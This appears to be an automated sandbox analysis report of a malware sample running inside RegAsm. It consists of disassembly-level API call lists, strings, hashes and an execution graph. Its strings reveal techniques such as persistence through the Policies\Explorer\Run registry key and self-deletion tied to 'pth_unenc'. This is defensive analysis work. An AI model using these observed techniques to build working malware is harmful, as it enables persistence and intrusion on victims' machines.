                                          APIs
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteOpenValue
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                          • API String ID: 2654517830-1051519024
                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                          APIs
                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteDirectoryFileRemove
                                          • String ID: pth_unenc
                                          • API String ID: 3325800564-4028850238
                                          • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                          • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                          APIs
                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ObjectProcessSingleTerminateWait
                                          • String ID: pth_unenc
                                          • API String ID: 1872346434-4028850238
                                          • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                          • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                          • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                          • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                          APIs
                                          • GetLastInputInfo.USER32(NG), ref: 0041BB87
                                          • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountInfoInputLastTick
                                          • String ID: NG
                                          • API String ID: 3478931382-1651712548
                                          • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                          • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                          • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                          • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                          • GetLastError.KERNEL32 ref: 00440D85
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast
                                          • String ID:
                                          • API String ID: 1717984340-0
                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastRead
                                          • String ID:
                                          • API String ID: 4100373531-0
                                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                          • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                          Execution Graph

                                          Execution Coverage:5.9%
                                          Dynamic/Decrypted Code Coverage:9.2%
                                          Signature Coverage:0%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:67
                                          execution_graph 37903 44660a 37906 4465e4 37903->37906 37905 446613 37907 4465f3 __dllonexit 37906->37907 37908 4465ed _onexit 37906->37908 37907->37905 37908->37907 40359 441819 40362 430737 40359->40362 40361 441825 40363 430756 40362->40363 40364 43076d 40362->40364 40365 430774 40363->40365 40366 43075f 40363->40366 40364->40361 40376 43034a 40365->40376 40387 4169a7 11 API calls 40366->40387 40369 4307ce 40371 430819 memset 40369->40371 40380 415b2c 40369->40380 40370 43077e 40370->40364 40370->40369 40374 4307fa 40370->40374 40371->40364 40373 4307e9 40373->40364 40373->40371 40388 4169a7 11 API calls 40374->40388 40377 43034e 40376->40377 40379 430359 40376->40379 40389 415c23 memcpy 40377->40389 40379->40370 40381 415b42 40380->40381 40386 415b46 40380->40386 40382 415b94 40381->40382 40384 415b5a 40381->40384 40381->40386 40383 4438b5 10 API calls 40382->40383 40383->40386 40385 415b79 memcpy 40384->40385 40384->40386 40385->40386 40386->40373 40387->40364 40388->40364 40389->40379 37721 442ec6 19 API calls 37898 4152c6 malloc 37899 4152e2 37898->37899 37900 4152ef 37898->37900 37902 416760 11 API calls 37900->37902 37902->37899 37909 4466f4 37928 446904 37909->37928 37911 446700 GetModuleHandleA 37914 446710 __set_app_type __p__fmode __p__commode 37911->37914 37913 4467a4 37915 4467ac __setusermatherr 37913->37915 37916 4467b8 37913->37916 37914->37913 37915->37916 37929 4468f0 _controlfp 37916->37929 37918 4467bd _initterm GetEnvironmentStringsW _initterm 37919 44681e GetStartupInfoW 37918->37919 37920 446810 37918->37920 37922 446866 GetModuleHandleA 37919->37922 37930 41276d 37922->37930 37926 446896 exit 37927 44689d _cexit 37926->37927 37927->37920 37928->37911 37929->37918 37931 41277d 37930->37931 37973 4044a4 LoadLibraryW 37931->37973 37933 412785 37934 412789 37933->37934 37979 414b81 37933->37979 37934->37926 37934->37927 37937 4127c8 37983 412465 memset ??2@YAPAXI 37937->37983 37939 4127ea 37995 40ac21 
37939->37995 37944 412813 38013 40dd07 memset 37944->38013 37945 412827 38018 40db69 memset 37945->38018 37948 412822 38040 4125b6 ??3@YAXPAX DeleteObject 37948->38040 37950 40ada2 _wcsicmp 37951 41283d 37950->37951 37951->37948 37954 412863 CoInitialize 37951->37954 38023 41268e 37951->38023 37953 412966 38041 40b1ab free free 37953->38041 38039 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37954->38039 37958 41296f 38042 40b633 37958->38042 37960 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37965 412957 CoUninitialize 37960->37965 37970 4128ca 37960->37970 37965->37948 37966 4128d0 TranslateAcceleratorW 37967 412941 GetMessageW 37966->37967 37966->37970 37967->37965 37967->37966 37968 412909 IsDialogMessageW 37968->37967 37968->37970 37969 4128fd IsDialogMessageW 37969->37967 37969->37968 37970->37966 37970->37968 37970->37969 37971 41292b TranslateMessage DispatchMessageW 37970->37971 37972 41291f IsDialogMessageW 37970->37972 37971->37967 37972->37967 37972->37971 37974 4044f3 37973->37974 37978 4044cf FreeLibrary 37973->37978 37976 404507 MessageBoxW 37974->37976 37977 40451e 37974->37977 37976->37933 37977->37933 37978->37974 37980 414b8a 37979->37980 37981 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37979->37981 38046 40a804 memset 37980->38046 37981->37937 37984 4124e0 37983->37984 37985 412505 ??2@YAPAXI 37984->37985 37986 41251c 37985->37986 37991 412521 37985->37991 38068 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37986->38068 38057 444722 37991->38057 37994 41259b wcscpy 37994->37939 38073 40b1ab free free 37995->38073 37999 40ad4b 38008 40ad76 37999->38008 38097 40a9ce 37999->38097 38000 40a9ce malloc memcpy free free 38001 40ac5c 38000->38001 38001->37999 38001->38000 38003 40ace7 free 38001->38003 38001->38008 38077 40a8d0 38001->38077 38089 4099f4 38001->38089 38003->38001 38007 40a8d0 7 API calls 38007->38008 38074 40aa04 38008->38074 38009 40ada2 38010 40adc9 
38009->38010 38011 40adaa 38009->38011 38010->37944 38010->37945 38011->38010 38012 40adb3 _wcsicmp 38011->38012 38012->38010 38012->38011 38102 40dce0 38013->38102 38015 40dd3a GetModuleHandleW 38107 40dba7 38015->38107 38019 40dce0 3 API calls 38018->38019 38020 40db99 38019->38020 38179 40dae1 38020->38179 38193 402f3a 38023->38193 38025 412766 38025->37948 38025->37954 38026 4126d3 _wcsicmp 38027 4126a8 38026->38027 38027->38025 38027->38026 38029 41270a 38027->38029 38228 4125f8 7 API calls 38027->38228 38029->38025 38196 411ac5 38029->38196 38039->37960 38040->37953 38041->37958 38043 40b640 38042->38043 38044 40b639 free 38042->38044 38045 40b1ab free free 38043->38045 38044->38043 38045->37934 38047 40a83b GetSystemDirectoryW 38046->38047 38048 40a84c wcscpy 38046->38048 38047->38048 38053 409719 wcslen 38048->38053 38051 40a881 LoadLibraryW 38052 40a886 38051->38052 38052->37981 38054 409724 38053->38054 38055 409739 wcscat LoadLibraryW 38053->38055 38054->38055 38056 40972c wcscat 38054->38056 38055->38051 38055->38052 38056->38055 38058 444732 38057->38058 38059 444728 DeleteObject 38057->38059 38069 409cc3 38058->38069 38059->38058 38061 412551 38062 4010f9 38061->38062 38063 401130 38062->38063 38064 401134 GetModuleHandleW LoadIconW 38063->38064 38065 401107 wcsncat 38063->38065 38066 40a7be 38064->38066 38065->38063 38067 40a7d2 38066->38067 38067->37994 38067->38067 38068->37991 38072 409bfd memset wcscpy 38069->38072 38071 409cdb CreateFontIndirectW 38071->38061 38072->38071 38073->38001 38075 40aa14 38074->38075 38076 40aa0a free 38074->38076 38075->38009 38076->38075 38078 40a8eb 38077->38078 38079 40a8df wcslen 38077->38079 38080 40a906 free 38078->38080 38081 40a90f 38078->38081 38079->38078 38085 40a919 38080->38085 38082 4099f4 3 API calls 38081->38082 38082->38085 38083 40a932 38087 4099f4 3 API calls 38083->38087 38084 40a929 free 38086 40a93e memcpy 38084->38086 38085->38083 38085->38084 38086->38001 38088 40a93d 38087->38088 38088->38086 
38090 409a41 38089->38090 38091 4099fb malloc 38089->38091 38090->38001 38093 409a37 38091->38093 38094 409a1c 38091->38094 38093->38001 38095 409a30 free 38094->38095 38096 409a20 memcpy 38094->38096 38095->38093 38096->38095 38098 40a9e7 38097->38098 38099 40a9dc free 38097->38099 38101 4099f4 3 API calls 38098->38101 38100 40a9f2 38099->38100 38100->38007 38101->38100 38126 409bca GetModuleFileNameW 38102->38126 38104 40dce6 wcsrchr 38105 40dcf5 38104->38105 38106 40dcf9 wcscat 38104->38106 38105->38106 38106->38015 38127 44db70 38107->38127 38111 40dbfd 38130 4447d9 38111->38130 38114 40dc34 wcscpy wcscpy 38156 40d6f5 38114->38156 38115 40dc1f wcscpy 38115->38114 38118 40d6f5 3 API calls 38119 40dc73 38118->38119 38120 40d6f5 3 API calls 38119->38120 38121 40dc89 38120->38121 38122 40d6f5 3 API calls 38121->38122 38123 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38122->38123 38162 40da80 38123->38162 38126->38104 38128 40dbb4 memset memset 38127->38128 38129 409bca GetModuleFileNameW 38128->38129 38129->38111 38132 4447f4 38130->38132 38131 40dc1b 38131->38114 38131->38115 38132->38131 38133 444807 ??2@YAPAXI 38132->38133 38134 44481f 38133->38134 38135 444873 _snwprintf 38134->38135 38136 4448ab wcscpy 38134->38136 38169 44474a 8 API calls 38135->38169 38138 4448bb 38136->38138 38170 44474a 8 API calls 38138->38170 38139 4448a7 38139->38136 38139->38138 38141 4448cd 38171 44474a 8 API calls 38141->38171 38143 4448e2 38172 44474a 8 API calls 38143->38172 38145 4448f7 38173 44474a 8 API calls 38145->38173 38147 44490c 38174 44474a 8 API calls 38147->38174 38149 444921 38175 44474a 8 API calls 38149->38175 38151 444936 38176 44474a 8 API calls 38151->38176 38153 44494b 38177 44474a 8 API calls 38153->38177 38155 444960 ??3@YAXPAX 38155->38131 38157 44db70 38156->38157 38158 40d702 memset GetPrivateProfileStringW 38157->38158 38159 40d752 38158->38159 38160 40d75c WritePrivateProfileStringW 38158->38160 38159->38160 38161 40d758 38159->38161 38160->38161 
38161->38118 38163 44db70 38162->38163 38164 40da8d memset 38163->38164 38165 40daac LoadStringW 38164->38165 38166 40dac6 38165->38166 38166->38165 38168 40dade 38166->38168 38178 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38166->38178 38168->37948 38169->38139 38170->38141 38171->38143 38172->38145 38173->38147 38174->38149 38175->38151 38176->38153 38177->38155 38178->38166 38189 409b98 GetFileAttributesW 38179->38189 38181 40daea 38182 40daef wcscpy wcscpy GetPrivateProfileIntW 38181->38182 38188 40db63 38181->38188 38190 40d65d GetPrivateProfileStringW 38182->38190 38184 40db3e 38191 40d65d GetPrivateProfileStringW 38184->38191 38186 40db4f 38192 40d65d GetPrivateProfileStringW 38186->38192 38188->37950 38189->38181 38190->38184 38191->38186 38192->38188 38229 40eaff 38193->38229 38197 411ae2 memset 38196->38197 38198 411b8f 38196->38198 38270 409bca GetModuleFileNameW 38197->38270 38210 411a8b 38198->38210 38200 411b0a wcsrchr 38201 411b22 wcscat 38200->38201 38202 411b1f 38200->38202 38271 414770 wcscpy wcscpy wcscpy CloseHandle 38201->38271 38202->38201 38204 411b67 38272 402afb 38204->38272 38208 411b7f 38328 40ea13 SendMessageW memset SendMessageW 38208->38328 38211 402afb 27 API calls 38210->38211 38212 411ac0 38211->38212 38213 4110dc 38212->38213 38214 41113e 38213->38214 38219 4110f0 38213->38219 38353 40969c LoadCursorW SetCursor 38214->38353 38216 411143 38227 40b04b ??3@YAXPAX 38216->38227 38354 444a54 38216->38354 38357 4032b4 38216->38357 38217 4110f7 _wcsicmp 38217->38219 38218 411157 38220 40ada2 _wcsicmp 38218->38220 38219->38214 38219->38217 38375 410c46 10 API calls 38219->38375 38223 411167 38220->38223 38221 4111af 38223->38221 38224 4111a6 qsort 38223->38224 38224->38221 38227->38218 38228->38027 38230 40eb10 38229->38230 38243 40e8e0 38230->38243 38233 40eb6c memcpy memcpy 38234 40ebe1 38233->38234 38235 40ebb7 38233->38235 38234->38233 38236 40ebf2 ??2@YAPAXI ??2@YAPAXI 38234->38236 38235->38234 38237 
40d134 16 API calls 38235->38237 38238 40ec2e ??2@YAPAXI 38236->38238 38241 40ec65 38236->38241 38237->38235 38238->38241 38253 40ea7f 38241->38253 38242 402f49 38242->38027 38244 40e8f2 38243->38244 38245 40e8eb ??3@YAXPAX 38243->38245 38246 40e900 38244->38246 38247 40e8f9 ??3@YAXPAX 38244->38247 38245->38244 38248 40e911 38246->38248 38249 40e90a ??3@YAXPAX 38246->38249 38247->38246 38250 40e931 ??2@YAPAXI ??2@YAPAXI 38248->38250 38251 40e921 ??3@YAXPAX 38248->38251 38252 40e92a ??3@YAXPAX 38248->38252 38249->38248 38250->38233 38251->38252 38252->38250 38254 40aa04 free 38253->38254 38255 40ea88 38254->38255 38256 40aa04 free 38255->38256 38257 40ea90 38256->38257 38258 40aa04 free 38257->38258 38259 40ea98 38258->38259 38260 40aa04 free 38259->38260 38261 40eaa0 38260->38261 38262 40a9ce 4 API calls 38261->38262 38263 40eab3 38262->38263 38264 40a9ce 4 API calls 38263->38264 38265 40eabd 38264->38265 38266 40a9ce 4 API calls 38265->38266 38267 40eac7 38266->38267 38268 40a9ce 4 API calls 38267->38268 38269 40ead1 38268->38269 38269->38242 38270->38200 38271->38204 38329 40b2cc 38272->38329 38274 402b0a 38275 40b2cc 27 API calls 38274->38275 38276 402b23 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402b3a 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402b54 38279->38280 38281 40b2cc 27 API calls 38280->38281 38282 402b6b 38281->38282 38283 40b2cc 27 API calls 38282->38283 38284 402b82 38283->38284 38285 40b2cc 27 API calls 38284->38285 38286 402b99 38285->38286 38287 40b2cc 27 API calls 38286->38287 38288 402bb0 38287->38288 38289 40b2cc 27 API calls 38288->38289 38290 402bc7 38289->38290 38291 40b2cc 27 API calls 38290->38291 38292 402bde 38291->38292 38293 40b2cc 27 API calls 38292->38293 38294 402bf5 38293->38294 38295 40b2cc 27 API calls 38294->38295 38296 402c0c 38295->38296 38297 40b2cc 27 API calls 38296->38297 38298 402c23 38297->38298 38299 40b2cc 27 API calls 38298->38299 38300 402c3a 38299->38300 38301 40b2cc 27 API calls 
38300->38301 38302 402c51 38301->38302 38303 40b2cc 27 API calls 38302->38303 38304 402c68 38303->38304 38305 40b2cc 27 API calls 38304->38305 38306 402c7f 38305->38306 38307 40b2cc 27 API calls 38306->38307 38308 402c99 38307->38308 38309 40b2cc 27 API calls 38308->38309 38310 402cb3 38309->38310 38311 40b2cc 27 API calls 38310->38311 38312 402cd5 38311->38312 38313 40b2cc 27 API calls 38312->38313 38314 402cf0 38313->38314 38315 40b2cc 27 API calls 38314->38315 38316 402d0b 38315->38316 38317 40b2cc 27 API calls 38316->38317 38318 402d26 38317->38318 38319 40b2cc 27 API calls 38318->38319 38320 402d3e 38319->38320 38321 40b2cc 27 API calls 38320->38321 38322 402d59 38321->38322 38323 40b2cc 27 API calls 38322->38323 38324 402d78 38323->38324 38325 40b2cc 27 API calls 38324->38325 38326 402d93 38325->38326 38327 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38326->38327 38327->38208 38328->38198 38332 40b58d 38329->38332 38331 40b2d1 38331->38274 38333 40b5a4 GetModuleHandleW FindResourceW 38332->38333 38334 40b62e 38332->38334 38335 40b5c2 LoadResource 38333->38335 38337 40b5e7 38333->38337 38334->38331 38336 40b5d0 SizeofResource LockResource 38335->38336 38335->38337 38336->38337 38337->38334 38345 40afcf 38337->38345 38339 40b608 memcpy 38348 40b4d3 memcpy 38339->38348 38341 40b61e 38349 40b3c1 18 API calls 38341->38349 38343 40b626 38350 40b04b 38343->38350 38346 40b04b ??3@YAXPAX 38345->38346 38347 40afd7 ??2@YAPAXI 38346->38347 38347->38339 38348->38341 38349->38343 38351 40b051 ??3@YAXPAX 38350->38351 38352 40b05f 38350->38352 38351->38352 38352->38334 38353->38216 38355 444a64 FreeLibrary 38354->38355 38356 444a83 38354->38356 38355->38356 38356->38218 38358 4032c4 38357->38358 38359 40b633 free 38358->38359 38360 403316 38359->38360 38376 44553b 38360->38376 38364 403480 38574 40368c 15 API calls 38364->38574 38366 403489 38367 40b633 free 38366->38367 38369 403495 38367->38369 38368 40333c 38368->38364 38370 
4033a9 memset memcpy 38368->38370 38371 4033ec wcscmp 38368->38371 38572 4028e7 11 API calls 38368->38572 38573 40f508 6 API calls 38368->38573 38369->38218 38370->38368 38370->38371 38371->38368 38373 403421 _wcsicmp 38373->38368 38375->38219 38377 445548 38376->38377 38378 445599 38377->38378 38575 40c768 38377->38575 38379 4455a8 memset 38378->38379 38521 4457f2 38378->38521 38659 403988 38379->38659 38385 4455e5 38394 445672 38385->38394 38404 44560f 38385->38404 38387 4458bb memset memset 38391 414c2e 16 API calls 38387->38391 38389 4459ed 38395 445a00 memset memset 38389->38395 38396 445b22 38389->38396 38390 44595e memset memset 38397 414c2e 16 API calls 38390->38397 38398 4458f9 38391->38398 38392 44557a 38399 44558c 38392->38399 38639 4136c0 38392->38639 38670 403fbe memset memset memset memset memset 38394->38670 38401 414c2e 16 API calls 38395->38401 38406 445bca 38396->38406 38407 445b38 memset memset memset 38396->38407 38402 44599c 38397->38402 38403 40b2cc 27 API calls 38398->38403 38643 444b06 38399->38643 38411 445a3e 38401->38411 38413 40b2cc 27 API calls 38402->38413 38414 445909 38403->38414 38416 4087b3 335 API calls 38404->38416 38415 445c8b memset memset 38406->38415 38472 445cf0 38406->38472 38419 445bd4 38407->38419 38420 445b98 38407->38420 38408 445849 38853 40b1ab free free 38408->38853 38421 40b2cc 27 API calls 38411->38421 38429 4459ac 38413->38429 38425 409d1f 6 API calls 38414->38425 38430 414c2e 16 API calls 38415->38430 38426 445621 38416->38426 38418 44589f 38854 40b1ab free free 38418->38854 38808 414c2e 38419->38808 38420->38419 38432 445ba2 38420->38432 38434 445a4f 38421->38434 38424 403335 38571 4452e5 43 API calls 38424->38571 38440 445919 38425->38440 38839 4454bf 20 API calls 38426->38839 38427 445823 38427->38408 38449 4087b3 335 API calls 38427->38449 38428 445854 38435 4458aa 38428->38435 38785 403c9c memset memset memset memset memset 38428->38785 38441 409d1f 6 API calls 38429->38441 38442 445cc9 38430->38442 38944 
4099c6 wcslen 38432->38944 38433 4456b2 38841 40b1ab free free 38433->38841 38446 409d1f 6 API calls 38434->38446 38435->38387 38468 44594a 38435->38468 38438 445d3d 38467 40b2cc 27 API calls 38438->38467 38439 445d88 memset memset memset 38450 414c2e 16 API calls 38439->38450 38855 409b98 GetFileAttributesW 38440->38855 38451 4459bc 38441->38451 38452 409d1f 6 API calls 38442->38452 38443 445879 38443->38418 38462 4087b3 335 API calls 38443->38462 38445 445680 38445->38433 38693 4087b3 memset 38445->38693 38455 445a63 38446->38455 38447 40b2cc 27 API calls 38456 445bf3 38447->38456 38449->38427 38459 445dde 38450->38459 38920 409b98 GetFileAttributesW 38451->38920 38461 445ce1 38452->38461 38453 445bb3 38947 445403 memset 38453->38947 38465 40b2cc 27 API calls 38455->38465 38824 409d1f wcslen wcslen 38456->38824 38457 445928 38457->38468 38856 40b6ef 38457->38856 38469 40b2cc 27 API calls 38459->38469 38964 409b98 GetFileAttributesW 38461->38964 38462->38443 38474 445a94 38465->38474 38477 445d54 _wcsicmp 38467->38477 38468->38389 38468->38390 38480 445def 38469->38480 38470 4459cb 38470->38389 38487 40b6ef 249 API calls 38470->38487 38472->38424 38472->38438 38472->38439 38473 445389 255 API calls 38473->38406 38921 40ae18 38474->38921 38475 44566d 38475->38521 38744 413d4c 38475->38744 38484 445d71 38477->38484 38548 445d67 38477->38548 38479 445665 38840 40b1ab free free 38479->38840 38485 409d1f 6 API calls 38480->38485 38965 445093 23 API calls 38484->38965 38492 445e03 38485->38492 38487->38389 38488 4456d8 38494 40b2cc 27 API calls 38488->38494 38491 44563c 38491->38479 38497 4087b3 335 API calls 38491->38497 38966 409b98 GetFileAttributesW 38492->38966 38493 40b6ef 249 API calls 38493->38424 38499 4456e2 38494->38499 38495 40b2cc 27 API calls 38500 445c23 38495->38500 38496 445d83 38496->38424 38497->38491 38842 413fa6 _wcsicmp _wcsicmp 38499->38842 38504 409d1f 6 API calls 38500->38504 38502 445e12 38508 445e6b 38502->38508 38515 40b2cc 27 API calls 
38502->38515 38506 445c37 38504->38506 38505 4456eb 38511 4456fd memset memset memset memset 38505->38511 38512 4457ea 38505->38512 38513 445389 255 API calls 38506->38513 38507 445b17 38941 40aebe 38507->38941 38968 445093 23 API calls 38508->38968 38843 409c70 wcscpy wcsrchr 38511->38843 38846 413d29 38512->38846 38519 445c47 38513->38519 38520 445e33 38515->38520 38517 445e7e 38522 445f67 38517->38522 38525 40b2cc 27 API calls 38519->38525 38526 409d1f 6 API calls 38520->38526 38521->38428 38762 403e2d memset memset memset memset memset 38521->38762 38528 40b2cc 27 API calls 38522->38528 38523 445ab2 memset 38529 40b2cc 27 API calls 38523->38529 38531 445c53 38525->38531 38527 445e47 38526->38527 38967 409b98 GetFileAttributesW 38527->38967 38533 445f73 38528->38533 38534 445aa1 38529->38534 38530 409c70 2 API calls 38535 44577e 38530->38535 38536 409d1f 6 API calls 38531->38536 38538 409d1f 6 API calls 38533->38538 38534->38507 38534->38523 38539 409d1f 6 API calls 38534->38539 38547 445389 255 API calls 38534->38547 38928 40add4 38534->38928 38933 40ae51 38534->38933 38540 409c70 2 API calls 38535->38540 38541 445c67 38536->38541 38537 445e56 38537->38508 38545 445e83 memset 38537->38545 38542 445f87 38538->38542 38539->38534 38543 44578d 38540->38543 38544 445389 255 API calls 38541->38544 38971 409b98 GetFileAttributesW 38542->38971 38543->38512 38550 40b2cc 27 API calls 38543->38550 38544->38406 38549 40b2cc 27 API calls 38545->38549 38547->38534 38548->38424 38548->38493 38551 445eab 38549->38551 38552 4457a8 38550->38552 38553 409d1f 6 API calls 38551->38553 38554 409d1f 6 API calls 38552->38554 38555 445ebf 38553->38555 38556 4457b8 38554->38556 38557 40ae18 9 API calls 38555->38557 38845 409b98 GetFileAttributesW 38556->38845 38567 445ef5 38557->38567 38559 4457c7 38559->38512 38561 4087b3 335 API calls 38559->38561 38560 40ae51 9 API calls 38560->38567 38561->38512 38562 445f5c 38564 40aebe FindClose 38562->38564 38563 40add4 2 API calls 38563->38567 
38564->38522 38565 40b2cc 27 API calls 38565->38567 38566 409d1f 6 API calls 38566->38567 38567->38560 38567->38562 38567->38563 38567->38565 38567->38566 38569 445f3a 38567->38569 38969 409b98 GetFileAttributesW 38567->38969 38970 445093 23 API calls 38569->38970 38571->38368 38572->38373 38573->38368 38574->38366 38576 40c775 38575->38576 38972 40b1ab free free 38576->38972 38578 40c788 38973 40b1ab free free 38578->38973 38580 40c790 38974 40b1ab free free 38580->38974 38582 40c798 38583 40aa04 free 38582->38583 38584 40c7a0 38583->38584 38975 40c274 memset 38584->38975 38589 40a8ab 9 API calls 38590 40c7c3 38589->38590 38591 40a8ab 9 API calls 38590->38591 38592 40c7d0 38591->38592 39004 40c3c3 38592->39004 38596 40c877 38605 40bdb0 38596->38605 38597 40c86c 39032 4053fe 37 API calls 38597->39032 38600 40c813 _wcslwr 39030 40c634 47 API calls 38600->39030 38602 40c829 wcslen 38603 40c7e5 38602->38603 38603->38596 38603->38597 39029 40a706 wcslen memcpy 38603->39029 39031 40c634 47 API calls 38603->39031 39166 404363 38605->39166 38610 40b2cc 27 API calls 38611 40be02 wcslen 38610->38611 38612 40bf5d 